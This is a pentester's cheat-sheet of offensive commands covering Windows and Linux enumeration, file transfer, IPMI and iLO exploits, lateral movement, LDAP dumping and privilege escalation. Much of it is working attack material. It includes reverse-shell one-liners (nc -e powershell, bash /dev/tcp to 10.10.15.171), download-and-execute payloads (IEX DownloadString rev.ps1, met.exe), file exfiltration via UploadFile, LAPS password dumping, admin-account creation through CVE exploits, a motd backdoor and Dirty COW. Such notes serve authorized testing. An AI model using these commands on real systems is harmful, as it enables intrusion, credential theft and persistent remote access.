Unsorted * [https://www.infosecmatter.com/powershell-commands-for-pentesters/](https://www.infosecmatter.com/powershell-commands-for-pentesters/) ``` PS > systeminfo PS > whoami /priv (whoami /all) PS > gci . -recurse -file -ea SilentlyContinue | select fullname PS > gci "$env:userprofile" -recurse -file -ea SilentlyContinue | select fullname PS > net user PS > net user /domain PS > net user j.doe /domain PS > net accounts PS > net accounts /domain PS > net localgroup Administrators PS > net group /domain PS > net group "Domain admins" /domain PS > net group "Enterprise admins" /domain PS > cmdkey /list PS > wmic product get name PS > wmic service get name,displayname,pathname,startmode PS > get-process PS > tasklist /SVC PS > net start PS > netstat -ano | findstr LIST PS > ipconfig /all PS > route print PS > dir -force c:\ PS > cmd /c "reg query HKLM\SYSTEM\CurrentControlSet\Services\NPCAP" PS > (wmic os get OSArchitecture)[2] PS > [Environment]::Is64BitOperatingSystem PS > [Environment]::Is64BitProcess PS > $ExecutionContext.SessionState.LanguageMode PS > [System.Net.Dns]::GetHostAddresses('hostname') | % {$_.IPAddressToString} PS > vssadmin list shadows (or run post/windows/manage/vss_list with MSF) ``` Common AV process names: | Process Name | Vendor/Product | |--------------|----------------------------------| | avp.exe | Kaspersky Internet Security | | cpda.exe | End Point Security (Check Point) | | MsMpEng.exe | Windows Defender | | ntrtscan.exe | Trend Micro OfficeScan | | tmlisten.exe | Trend Micro OfficeScan | ``` PS > gc .\100-hosts.txt | % {gwmi -Query "select * from Win32_Process" -ComputerName $_ | ? {$_.Caption -in "avp.exe","cpda.exe","MsMpEng.exe","ntrtscan.exe","tmlisten.exe"} | select ProcessName,PSComputerName} ``` Identify Microsoft.NET version: ``` PS > cd C:\Windows\Microsoft.NET\Framework64\ PS > ls PS > cd .\v4.0.30319\ PS > Get-Item .\clr.dll | Fl Or PS > [System.Diagnostics.FileVersionInfo]::GetVersionInfo($(Get-Item .\clr.dll)).FileVersion ``` # ExecutionPolicy Bypass * [https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/) * [https://bestestredteam.com/2019/01/27/powershell-execution-policy-bypass/](https://bestestredteam.com/2019/01/27/powershell-execution-policy-bypass/) # File Transfer ## Linux * [https://snovvcrash.github.io/2018/10/11/simple-http-servers.html](https://snovvcrash.github.io/2018/10/11/simple-http-servers.html) ## Windows ### Base64 Local file to base64: ``` Cmd > certutil -encode <FILE_TO_ENCODE> C:\Windows\Temp\encoded.b64 Cmd > type C:\Windows\Temp\encoded.b64 ``` Local string to base64 and POST: ``` PS > $str = cmd /c net user /domain PS > $base64str = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str)) PS > IWR -Uri http://127.0.0.1/msg -Method POST -Body $base64str ``` ### Hex Compress a binary file and transfer it to Windows by copy-pasting commands into the console: ``` $ upx -9 file.exe $ exe2hex -x file.exe -p file.cmd $ cat file.cmd | xclip -i -sel c ``` ### PowerShell PowerShell upload file: ``` PS > (New-Object Net.WebClient).UploadFile("http://10.10.13.37/file.txt", "file.txt") ``` PowerShell auto detect proxy, download file from remote HTTP server and run it: ``` $proxyAddr=(Get-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings").ProxyServer;$proxy=New-Object System.Net.WebProxy;$proxy.Address=$proxyAddr;$proxy.UseDefaultCredentials=$true;$client=New-Object System.Net.WebClient;$client.Proxy=$proxy;$client.DownloadFile("http://10.10.13.37/met.exe","$env:userprofile\music\met.exe");$exec=New-Object -com shell.application;$exec.shellexecute("$env:userprofile\music\met.exe") ``` PowerShell manually set proxy and upload file to remote HTTP server: ``` $client=New-Object System.Net.WebClient;$proxy=New-Object System.Net.WebProxy("http://proxy.megacorp.local:3128",$true);$creds=New-Object Net.NetworkCredential("snovvcrash","Passw0rd!","megacorp.local");$creds=$creds.GetCredential("http://proxy.megacorp.local","3128","KERBEROS");$proxy.Credentials=$creds;$client.Proxy=$proxy;$client.UploadFile("http://10.10.13.37/results.txt","results.txt") ``` ## Linux2Linux ### /dev/tcp ``` # Sender: root@kali:$ tar -zcvf folder.tar.gz folder root@kali:$ nc -w3 -lvnp 1234 < folder.tar.gz # Recipient: www-data@victim:$ bash -c 'cat < /dev/tcp/127.0.0.1/1234 > .folder.tar.gz' www-data@victim:$ tar -zxvf .folder.tar.gz # Recipient: root@kali:$ nc -w3 -lvnp 1234 > file.txt # Sender: www-data@victim:$ bash -c 'cat < file.txt > /dev/tcp/127.0.0.1/1234' ``` ## Linux2Windows * [https://blog.ropnop.com/transferring-files-from-kali-to-windows/](https://blog.ropnop.com/transferring-files-from-kali-to-windows/) ### Base64 Full base64 file transfer from Linux to Windows: ``` $ base64 -w0 tunnel.aspx; echo ...BASE64_CONTENTS... PS > Add-Content -Encoding UTF8 tunnel.b64 "<BASE64_CONTENTS>" -NoNewLine PS > $data = Get-Content -Raw tunnel.b64 PS > [IO.File]::WriteAllBytes("C:\inetpub\wwwroot\uploads\tunnel.aspx", [Convert]::FromBase64String($data)) ``` ### SMB #### smbserver.py Start SMB server: ``` $ sudo smbserver.py -smb2support files `pwd` ``` Mount SMB in Windows with `net use`: ``` $ sudo smbserver.py -username snovvcrash -password 'Passw0rd!' -smb2support share `pwd` PS > net use Z: \\10.10.14.16\share PS > net use Z: \\10.10.14.16\share /u:snovvcrash 'Passw0rd!' ``` Mount SMB in Windows with `New-PSDrive`: ``` $ sudo smbserver.py -username snovvcrash -password 'Passw0rd!' -smb2support share `pwd` PS > $pass = 'Passw0rd!' | ConvertTo-SecureString -AsPlainText -Force PS > $cred = New-Object System.Management.Automation.PSCredential('snovvcrash', $pass) Or PS > $cred = New-Object System.Management.Automation.PSCredential('snovvcrash', $(ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force)) PS > New-PSDrive -name Z -root \\10.10.14.16\share -Credential $cred -PSProvider 'filesystem' PS > cd Z: ``` #### net share ``` Cmd > net share pentest=c:\smb_pentest /GRANT:"Anonymous Logon,FULL" /GRANT:"Everyone,FULL" Or Cmd > net share pentest=c:\smb_pentest /GRANT:"Administrator,FULL" Cmd > net share pentest /delete ``` ### FTP ``` $ python -m pip install pyftpdlib $ python -m pyftpdlib -Dwp 2121 Cmd > cd C:\Windows\System32\spool\drivers\color Cmd > echo 'open 127.0.0.1 2121' > ftp.txt Cmd > echo 'user anonymous' >> ftp.txt Cmd > echo 'anonymous' >> ftp.txt Cmd > echo 'binary' >> ftp.txt Cmd > echo 'put file.bin' >> ftp.txt Cmd > echo 'bye' >> ftp.txt Cmd > ftp -v -n -s:ftp.txt ``` ### TFTP Send `file.exe` from Windows to Linux (TFTP client must be [enabled](https://teckangaroo.com/enable-tftp-windows-10/) on Windows): ``` $ sudo atftpd --daemon --bind 10.10.13.37 --port 69 ./tftp Cmd > tftp -i 10.10.13.37 put file.exe $ sudo pkill atftpd ``` # Information Gathering ## Google Dorks ``` site:megacorp.com filetype:(doc | docx | docm | xls | xlsx | xlsm | ppt | pptx | pptm | pdf | rtf | odt | xml | txt) site:megacorp.com ext:(config | cfg | ini | log | bak | backup | dat) site:megacorp.com ext:(php | asp | aspx) "@megacorp.com" email e-mail "megacorp.com" site:ideone.com | site:codebeautify.org | site:codeshare.io | site:codepen.io | site:repl.it | site:justpaste.it | site:pastebin.com | site:jsfiddle.net | site:trello.com ``` # IPMI * [https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/](https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/) * [https://habr.com/ru/company/selectel/blog/439834/](https://habr.com/ru/company/selectel/blog/439834/) ## Discovery ``` msf > use auxiliary/scanner/ipmi/ipmi_version ``` ## Dump Hashes **CVE-2013-4786** ``` msf > use scanner/ipmi/ipmi_dumphashes ``` ## Cipher Zero **CVE-2013-4805** Discover with MSF: ``` msf > use scanner/ipmi/ipmi/ipmi_cipher_zero ``` Guess existing admin username. If `ADMIN` username is correct, the `list` command will succeed (password doesn't matter): ``` $ sudo apt install ipmitool $ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user list ``` Add new admin user (only existing admin username is needed): ``` $ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user set name <ID> snovvcrash $ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user set password <ID> 'Passw0rd!' $ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user priv <ID> 4 $ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user enable <ID> ``` ## Anonymous Authentication Can be discovered with MSF `ipmi_dumphashes` but also with ipmitool: ``` $ ipmitool -I lanplus -H 127.0.0.1 -U '' -P '' user list ``` Change password of a named user account: ``` $ ipmitool -I lanplus -H 127.0.0.1 -U '' -P '' user set password <ID> 'Passw0rd!' ``` ## HPE iLO 4 * [https://codeby.net/threads/poluchaem-dostup-k-hp-ilo.63224/](https://codeby.net/threads/poluchaem-dostup-k-hp-ilo.63224/) * [https://github.com/airbus-seclab/ilo4_toolbox](https://github.com/airbus-seclab/ilo4_toolbox) ### Add Admin User **CVE-2017-12542** Exploit with Python: * [https://www.exploit-db.com/exploits/44005](https://www.exploit-db.com/exploits/44005) ``` $ ./44005.py -t -e -u snovvcrash -p 'Passw0rd!' 127.0.0.1 ``` Exploit with MSF: ``` msf > use auxiliary/admin/hp/hp_ilo_create_admin_account ``` # Java RMI ## Enumerate Check if class loader is enabled: ``` msf > use auxiliary/scanner/misc/java_rmi_server ``` Dump registry with MSF: ``` msf > use use auxiliary/gather/java_rmi_registry ``` Dump registry with Nmap: ``` $ sudo nmap -sV --script "rmi-dumpregistry or rmi-vuln-classloader" 10.10.13.37 -p1098 ``` ## BaRMIe * [https://github.com/NickstaDB/BaRMIe](https://github.com/NickstaDB/BaRMIe) ``` $ java -jar BaRMIe.jar -enum 10.10.13.37 1098 $ java -jar BaRMIe.jar -attack 10.10.13.37 1098 ``` ## remote-method-guesser * [https://github.com/qtc-de/remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) ``` $ java -jar rmg-3.0.0-jar-with-dependencies.jar 10.10.13.37 1098 enum ``` ## rmiscout * [https://github.com/BishopFox/rmiscout](https://github.com/BishopFox/rmiscout) # Kali ## Configure Mix settings list (both for hardware install and virtualization): ``` [VM] Disable screen lock (Power Manager -> Display, Security -> OFF) [VM] Configure networks (+ remember to configure VBox DHCP first) [All] Update && Upgrade (+ change /etc/apt/sources.list to HTTPS if getting "403 Forbidden" because of AV) $ sudo apt update && sudo upgrade -y $ sudo reboot [VM] Install guest additions * Insert Guest Additions CD image and open terminal there $ cp /media/cdrom0/VBoxLinuxAdditions.run ~/Desktop && chmod 755 ~/Desktop/VBoxLinuxAdditions.run && sudo ~/Desktop/VBoxLinuxAdditions.run $ sudo reboot $ rm ~/Desktop/VBoxLinuxAdditions.run && sudo eject [ALL] Manage users * Enable root or create new user SWITCH { CASE (root): $ sudo -i $ passwd root * Re-login as root CASE (non-root): $ sudo useradd -m -s /bin/bash -u 1337 snovvcrash $ sudo passwd snovvcrash $ sudo usermod -aG sudo snovvcrash * Re-login as snovvcrash } * Disable kali user [VM] SWITCH { CASE (lock): $ sudo usermod -L kali $ sudo usermod -s /sbin/nologin kali $ sudo chage -E0 kali CASE (delete): $ sudo userdel -r kali } [ALL] Configure sudo * Increase sudo password timeout value or disable password prompt completely $ sudo visudo SWITCH { CASE (increase timeout): "Defaults env_reset,timestamp_timeout=45" CASE (disable password): "snovvcrash ALL=(ALL) NOPASSWD: ALL" } [ALL] Install cmake $ sudo apt install cmake -y [ALL] Clone dotfiles $ git clone https://github.com/snovvcrash/dotfiles-linux ~/.dotfiles [ALL] Run ~/.dotfiles/00-autodeploy scripts on the discretion ``` ## VirtualBox ### Guest Additions Known issues: * [https://forums.virtualbox.org/viewtopic.php?f=3&t=96087](https://forums.virtualbox.org/viewtopic.php?f=3&t=96087) * [https://www.ceos3c.com/hacking/kali-linux-2020-1-virtualbox-shared-clipboard-stopped-working-fixed/](https://www.ceos3c.com/hacking/kali-linux-2020-1-virtualbox-shared-clipboard-stopped-working-fixed/) ### Network Configure multiple interfaces to work simultaneously: ``` $ cat /etc/network/interfaces # This file describes the network interfaces available on your system # and how to activate them. For more information, see interfaces(5). source /etc/network/interfaces.d/* # NAT allow-hotplug eth0 iface eth0 inet dhcp # Internal allow-hotplug eth1 iface eth1 inet dhcp # Host-only allow-hotplug eth2 iface eth2 inet dhcp # The loopback network interface auto lo iface lo inet loopback ``` ``` $ ifup eth0 $ ifup eth1 $ ifup eth2 ``` * [https://unix.stackexchange.com/questions/37122/virtualbox-two-network-interfaces-nat-and-host-only-ones-in-a-debian-guest-on](https://unix.stackexchange.com/questions/37122/virtualbox-two-network-interfaces-nat-and-host-only-ones-in-a-debian-guest-on) * [https://kali.training/topic/configuring-the-network/](https://kali.training/topic/configuring-the-network/) * [https://www.blackmoreops.com/2013/11/25/how-to-fix-wired-network-interface-device-not-managed-error/](https://www.blackmoreops.com/2013/11/25/how-to-fix-wired-network-interface-device-not-managed-error/) * [https://www.virtualbox.org/manual/ch06.html](https://www.virtualbox.org/manual/ch06.html) * [https://forums.kali.org/showthread.php?29657-Only-one-of-multiple-wired-interfaces-(eth0-eth1-etc)-can-be-active-at-a-time](https://forums.kali.org/showthread.php?29657-Only-one-of-multiple-wired-interfaces-%28eth0-eth1-etc%29-can-be-active-at-a-time) ### Share Folder (depreciated) Mount: ``` $ mkdir ~/Desktop/Share $ mount -t vboxsf /mnt/share-host ~/Desktop/Share Or (if mounted from VBox settings) $ ln -s /mnt/share-host ~/Desktop/Share $ sudo adduser $USER vboxsf ``` Automount: ``` $ crontab -e "@reboot sleep 10; mount -t vboxsf /mnt/share-host ~/Desktop/Share" ``` # Lateral Movement * [https://eventlogxp.com/blog/logon-type-what-does-it-mean/](https://eventlogxp.com/blog/logon-type-what-does-it-mean/) * [https://www.infosecmatter.com/rce-on-windows-from-linux-part-1-impacket/](https://www.infosecmatter.com/rce-on-windows-from-linux-part-1-impacket/) * [https://www.hackingarticles.in/remote-code-execution-using-impacket/](https://www.hackingarticles.in/remote-code-execution-using-impacket/) * [https://xakep.ru/2020/11/16/lateral-guide/](https://xakep.ru/2020/11/16/lateral-guide/) ## RDP * [https://syfuhs.net/how-authentication-works-when-you-use-remote-desktop](https://syfuhs.net/how-authentication-works-when-you-use-remote-desktop) * [https://posts.specterops.io/revisiting-remote-desktop-lateral-movement-8fb905cb46c3](https://posts.specterops.io/revisiting-remote-desktop-lateral-movement-8fb905cb46c3) * [https://swarm.ptsecurity.com/remote-desktop-services-shadowing/](https://swarm.ptsecurity.com/remote-desktop-services-shadowing/) ### Enable RDP From meterpreter: ``` meterpreter > run getgui -e ``` From PowerShell: ``` PS > Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" -Value 0 PS > Enable-NetFirewallRule -DisplayGroup "Remote Desktop" PS > Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" -Name "UserAuthentication" -Value 1 ``` ### Restricted Admin * [https://www.kali.org/penetration-testing/passing-hash-remote-desktop/](https://www.kali.org/penetration-testing/passing-hash-remote-desktop/) * [https://blog.ahasayen.com/restricted-admin-mode-for-rdp/](https://blog.ahasayen.com/restricted-admin-mode-for-rdp/) * [https://labs.f-secure.com/blog/undisable/](https://labs.f-secure.com/blog/undisable/) * [https://shellz.club/pass-the-hash-with-rdp-in-2019/](https://shellz.club/pass-the-hash-with-rdp-in-2019/) RDP with [PtH](http://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/): RDP needs a plaintext password unless Restricted Admin mode is enabled. Enable Restricted Admin mode: ``` PS > Get-ChildItem -Recurse HKLM:\System\CurrentControlSet\Control\Lsa PS > Get-Item HKLM:\System\CurrentControlSet\Control\Lsa PS > New-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\Lsa -Name "DisableRestrictedAdmin" -Value 0 -PropertyType "DWORD" PS > Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name "DisableRestrictedAdmin" ``` ### NLA Disable NLA: ``` PS > (Get-WmiObject -class "Win32_TSGeneralSetting" -Namespace root\cimv2\terminalservices -ComputerName "PC01" -Filter "TerminalName='RDP-tcp'").UserAuthenticationRequired PS > (Get-WmiObject -class "Win32_TSGeneralSetting" -Namespace root\cimv2\terminalservices -ComputerName "PC01" -Filter "TerminalName='RDP-tcp'").SetUserAuthenticationRequired(0) ``` ### Abusing CredSSP / TSPKG * [https://clement.notin.org/blog/2019/07/03/credential-theft-without-admin-or-touching-lsass-with-kekeo-by-abusing-credssp-tspkg-rdp-sso/](https://clement.notin.org/blog/2019/07/03/credential-theft-without-admin-or-touching-lsass-with-kekeo-by-abusing-credssp-tspkg-rdp-sso/) ## runas ``` PS > runas /netonly /user:snovvcrash powershell ``` ## WinRM / PSRemoting * [https://www.bloggingforlogging.com/2018/01/24/demystifying-winrm/](https://www.bloggingforlogging.com/2018/01/24/demystifying-winrm/) * [https://www.powershellmagazine.com/2014/03/06/accidental-sabotage-beware-of-credssp/](https://www.powershellmagazine.com/2014/03/06/accidental-sabotage-beware-of-credssp/) * [https://www.ired.team/offensive-security/credential-access-and-credential-dumping/network-vs-interactive-logons](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/network-vs-interactive-logons) ### Evil-WinRM * [https://github.com/Hackplayers/evil-winrm](https://github.com/Hackplayers/evil-winrm) Install: ``` $ git clone https://github.com/Hackplayers/evil-winrm ~/tools/evil-winrm $ cd ~/tools/evil-winrm && bundle install && cd - $ ln -s ~/tools/evil-winrm/evil-winrm.rb /usr/local/bin/evil-winrm Or $ gem install evil-winrm ``` Run: ``` $ evil-winrm -u '[MEGACORP\]snovvcrash' -p 'Passw0rd!' -i 10.10.13.37 -s `pwd` -e `pwd` $ evil-winrm -u '[MEGACORP\]snovvcrash' -H FC525C9683E8FE067095BA2DDC971889 -i 10.10.13.37 -s `pwd` -e `pwd` ``` Note: always use full username when authenticating as a domain user, because if there're 2 users sharing the same name (a local user and a domain user), say `WORKGROUP\Administrator` and `MEGACORP\Administrator`, and you're trying to authenticate as a domain admin without providing the domain prefix, authentication will fail. ## SMB ### PsExec * [https://www.contextis.com/us/blog/lateral-movement-a-deep-look-into-psexec](https://www.contextis.com/us/blog/lateral-movement-a-deep-look-into-psexec) * [https://blog.openthreatresearch.com/ntobjectmanager_rpc_smb_scm](https://blog.openthreatresearch.com/ntobjectmanager_rpc_smb_scm) #### psexec.py ``` $ psexec.py snovvcrash:'Passw0rd!'@127.0.0.1 [powershell.exe] $ psexec.py -hashes :6bb872d8a9aee9fd6ed2265c8b486490 [email protected] ``` ## WMI * [https://www.ethicalhacker.net/features/root/wmi-101-for-pentesters/](https://www.ethicalhacker.net/features/root/wmi-101-for-pentesters/) ### PowerShell Basic command to check if we have privileges to execute WMI: ``` PS > Get-WmiObject -Credential $cred -ComputerName PC01 -Namespace "root" -class "__Namesapce" | Select Name ``` Execute commands: ``` PS > Invoke-WmiMethod -Credential $cred -ComputerName PC01 win32_process -Name Create -ArgumentList ("powershell (New-Object Net.WebClient).DownloadFile('http://10.10.13.37/nc.exe', 'C:\Users\bob\music\nc.exe')") PS > Invoke-WmiMethod -Credential $cred -ComputerName PC01 win32_process -Name Create -ArgumentList ("C:\Users\bob\music\nc.exe 10.10.13.37 1337 -e powershell") ``` ### wmiexec.py ``` $ wmiexec.py -codec cp866 snovvcrash:'Passw0rd!'@127.0.0.1 $ wmiexec.py -hashes :6bb872d8a9aee9fd6ed2265c8b486490 [email protected] ``` Get a PowerShell reverse-shell: ``` $ sudo python3 -m http.server 80 $ sudo rlwrap nc -lvnp 443 $ wmiexec.py -nooutput snovvcrash:'Passw0rd!'@10.10.13.38 "powershell IEX(New-Object Net.WebClient).DownloadString('http://10.10.13.37/rev.ps1')" ``` ## Rubeus * [https://github.com/GhostPack/Rubeus](https://github.com/GhostPack/Rubeus) * [https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe) Create a sacrificial process, legitimately ask Kerberos for TGT and interact with the process: * [https://github.com/GhostPack/Rubeus#example-over-pass-the-hash](https://github.com/GhostPack/Rubeus#example-over-pass-the-hash) ``` Cmd > .\Rubeus.exe asktgt /domain:megacorp.local /dc:dc1 /user:snovvcrash /password:Passw0rd! /createnetonly:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /show ``` ## Run as Another User ### Cmd #### runas ``` Cmd > runas /u:snovvcrash powershell.exe ``` #### PowerShell ``` PS > $cred = New-Object System.Management.Automation.PSCredential('<HOSTNAME>\<USERNAME>', $(ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force)) ``` ##### Process.Start ``` PS > $computer = "PC01" PS > [System.Diagnostics.Process]::Start("C:\Windows\System32\cmd.exe", "/c ping -n 1 10.10.13.37", $cred.Username, $cred.Password, $computer) ``` ##### Start-Process ``` PS > Start-Process -FilePath "C:\Windows\System32\cmd.exe" -ArgumentList "/c ping -n 1 10.10.13.37" -Credential $cred ``` ##### Invoke-Command With `-Credential`: ``` PS > Invoke-Command -ComputerName <HOSTNAME> -ScriptBlock { whoami } -Credential $cred ``` With `-Session`: ``` PS > $s = New-PSSession -ComputerName <HOSTNAME> -Credential $cred PS > Invoke-Command -ScriptBlock { whoami } -Session $s ``` ##### Invoke-RunAs * [https://github.com/BC-SECURITY/Empire/blob/master/data/module_source/management/Invoke-RunAs.ps1](https://github.com/BC-SECURITY/Empire/blob/master/data/module_source/management/Invoke-RunAs.ps1) ``` PS > Invoke-RunAs -UserName snovvcrash -Password 'Passw0rd!' -Domain MEGACORP -Cmd cmd.exe -Arguments "/c ping -n 1 10.10.13.37" ``` ##### Invoke-CommandAs * [https://github.com/mkellerman/Invoke-CommandAs/blob/master/Invoke-CommandAs/Private/Invoke-ScheduledTask.ps1](https://github.com/mkellerman/Invoke-CommandAs/blob/master/Invoke-CommandAs/Private/Invoke-ScheduledTask.ps1) * [https://github.com/mkellerman/Invoke-CommandAs/blob/master/Invoke-CommandAs/Public/Invoke-CommandAs.ps1](https://github.com/mkellerman/Invoke-CommandAs/blob/master/Invoke-CommandAs/Public/Invoke-CommandAs.ps1) * [https://malicious.link/post/2020/run-as-system-using-evil-winrm/](https://malicious.link/post/2020/run-as-system-using-evil-winrm/) ``` PS > . .\Invoke-ScheduledTask.ps1 PS > . .\Invoke-CommandAs.ps1 PS > Invoke-CommandAs -ScriptBlock {whoami} -AsUser $cred ``` ##### RunasCs * [https://github.com/antonioCoco/RunasCs/blob/master/Invoke-RunasCs.ps1](https://github.com/antonioCoco/RunasCs/blob/master/Invoke-RunasCs.ps1) ``` $ rlwrap nc -lvnp 1337 PS > Invoke-RunasCs -Username snovvcrash -Password 'Passw0rd!' -Domain megacorp.local -Command powershell.exe -Remote 10.10.13.37:1337 ``` # LDAP * [https://book.hacktricks.xyz/pentesting/pentesting-ldap](https://book.hacktricks.xyz/pentesting/pentesting-ldap) ## ldapsearch Basic syntax: ``` $ ldapsearch -h 127.0.0.1 -x -s <SCOPE> -b <BASE_DN> <QUERY> <FILTER> <FILTER> <FILTER> ``` Get base naming contexts: ``` $ ldapsearch -h 127.0.0.1 -x -s base namingcontexts ``` Extract data for the whole domain catalog and then grep your way through: ``` $ ldapsearch -h 127.0.0.1 -x -s sub -b "DC=megacorp,DC=local" | tee ldapsearch.out $ cat ldapsearch.out | grep -i memberof ``` Or filter out only what you need: ``` $ ldapsearch -h 127.0.0.1 -x -b "DC=megacorp,DC=local" '(objectClass=User)' sAMAccountName sAMAccountType ``` Get `Remote Management Users` group: ``` $ ldapsearch -h 127.0.0.1 -x -b "DC=megacorp,DC=local" '(memberOf=CN=Remote Management Users,OU=Groups,OU=UK,DC=megacorp,DC=local)' | grep -i memberof ``` Dump LAPS passwords: ``` $ ldapsearch -h 127.0.0.1 -x -b "dc=megacorp,dc=local" '(ms-MCS-AdmPwd=*)' ms-MCS-AdmPwd ``` Simple authentication with ldapsearch: ``` $ ldapsearch -H ldap://127.0.0.1:389 -x -D 'CN=snovvcrash,CN=Users,DC=megacorp,DC=local' -w 'Passw0rd!' -s sub -b 'DC=megacorp,DC=local' | tee ldapsearch.out ``` Analyze large output for anomalies by searching for unique strings: ``` $ cat ldapsearch.out | awk '{print $1}' | sort | uniq -c | sort -nr ``` ## windapsearch * [https://github.com/ropnop/windapsearch](https://github.com/ropnop/windapsearch) Enumerate all AD Computers: ``` ./windapsearch.py -u 'megacorp.local\snovvcrash' -p 'Passw0rd!' --dc 127.0.0.1 -C ``` ## Nmap NSE ``` $ nmap -n -Pn -sV --script ldap-rootdse 127.0.0.1 -p389 $ nmap -n -Pn -sV --script ldap-search 127.0.0.1 -p389 $ nmap -n -Pn -sV --script ldap-brute 127.0.0.1 -p389 ``` # LPE * [PayloadsAllTheThings/Windows - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md) ## Linux ### Filesystem Grep for sensitive keywords: ``` $ grep -nir passw /etc/ 2>/dev/null ``` Find and list all files newer than `2020-03-16` and not newer than `2020-03-17`: ``` $ find / -type f -readable -newermt '2020-03-16' ! -newermt '2020-03-17' -ls 2>/dev/null ``` Find SUID binaries: ``` # User $ find / -type f -perm /4000 -ls 2>/dev/null # Group $ find / -type f -perm /2000 -ls 2>/dev/null # Both $ find / -type f -perm /6000 -ls 2>/dev/null ``` #### linPEAS * [https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh) ### Rootkits * [0x00sec.org/t/kernel-rootkits-getting-your-hands-dirty/1485](https://0x00sec.org/t/kernel-rootkits-getting-your-hands-dirty/1485) ### Dirty COW * [https://github.com/FireFart/dirtycow/blob/master/dirty.c](https://github.com/FireFart/dirtycow/blob/master/dirty.c) ``` $ curl -L https://github.com/FireFart/dirtycow/raw/master/dirty.c > dirty.c $ gcc dirty.c -o dirty -pthread -lcrypt $ ./dirty Passw0rd $ su firefart ``` ### logrotate * [https://github.com/whotwagner/logrotten/blob/master/logrotten.c](https://github.com/whotwagner/logrotten/blob/master/logrotten.c) ``` $ curl https://github.com/whotwagner/logrotten/raw/master/logrotten.c > lr.c $ gcc lr.c -o lr $ cat payloadfile if [ `id -u` -eq 0 ]; then (bash -c 'bash -i >& /dev/tcp/10.10.15.171/9001 0>&1' &); fi $ ./lr -p ./payload -t /home/snovvcrash/backups/access.log -d ``` * [https://github.com/whotwagner/logrotten](https://github.com/whotwagner/logrotten) * [https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges](https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges) * [https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition](https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition) * [https://popsul.ru/blog/2013/01/post-42.html](https://popsul.ru/blog/2013/01/post-42.html) ### motd `/etc/update-motd.d/`: ``` $ shellpop --reverse --number 8 -H 127.0.0.1 -P 1337 --base64 $ echo '<BASE64_SHELL>' >> 00-header * Fire up new SSH session and catch the reverse shell ``` * [https://www.securityfocus.com/bid/50192/discuss](https://www.securityfocus.com/bid/50192/discuss) PAM MOTD: * [https://www.exploit-db.com/exploits/14273](https://www.exploit-db.com/exploits/14273) * [https://www.exploit-db.com/exploits/14339](https://www.exploit-db.com/exploits/14339) ## Windows ### Registry & Filesystem ``` PS > gc $env:appdata\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt PS > cmd /c dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* PS > cmd /c where /R C:\ *.ini PS > cmd /c 'cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt' PS > reg query HKLM /f "password" /t REG_SZ /s PS > reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" | findstr /i "DefaultUserName DefaultDomainName DefaultPassword AltDefaultUserName AltDefaultDomainName AltDefaultPassword LastUsedUsername" Or PS > Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" | select DefaultPassword PS > reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" | findstr /i proxy ``` ### AccessChk * [https://www.fuzzysecurity.com/tutorials/16.html](https://www.fuzzysecurity.com/tutorials/16.html) * [https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk](https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk) * [https://xor.cat/2017/09/05/sysinternals-accesschk-accepteula/](https://xor.cat/2017/09/05/sysinternals-accesschk-accepteula/) Find weak file permissions: ``` Cmd > .\accesschk.exe /accepteula -uwsq Users c:\*.* Cmd > .\accesschk.exe /accepteula -uwsq "Authenticated Users" c:\*.* ``` Find weak directory permissions: ``` Cmd > .\accesschk.exe /accepteula -uwdsq Users c:\ Cmd > .\accesschk.exe /accepteula -uwdsq "Authenticated Users" c:\ ``` Find weak service permissions: ``` .\accesschk.exe /accepteula -uwcqv Users * .\accesschk.exe /accepteula -uwcqv "Authenticated Users" * ``` #### upnphost & SSDPSRV (Windows XP) * [https://sohvaxus.github.io/content/winxp-sp1-privesc.html](https://sohvaxus.github.io/content/winxp-sp1-privesc.html) * [PayloadsAllTheThings/Example with Windows XP SP0/SP1 - 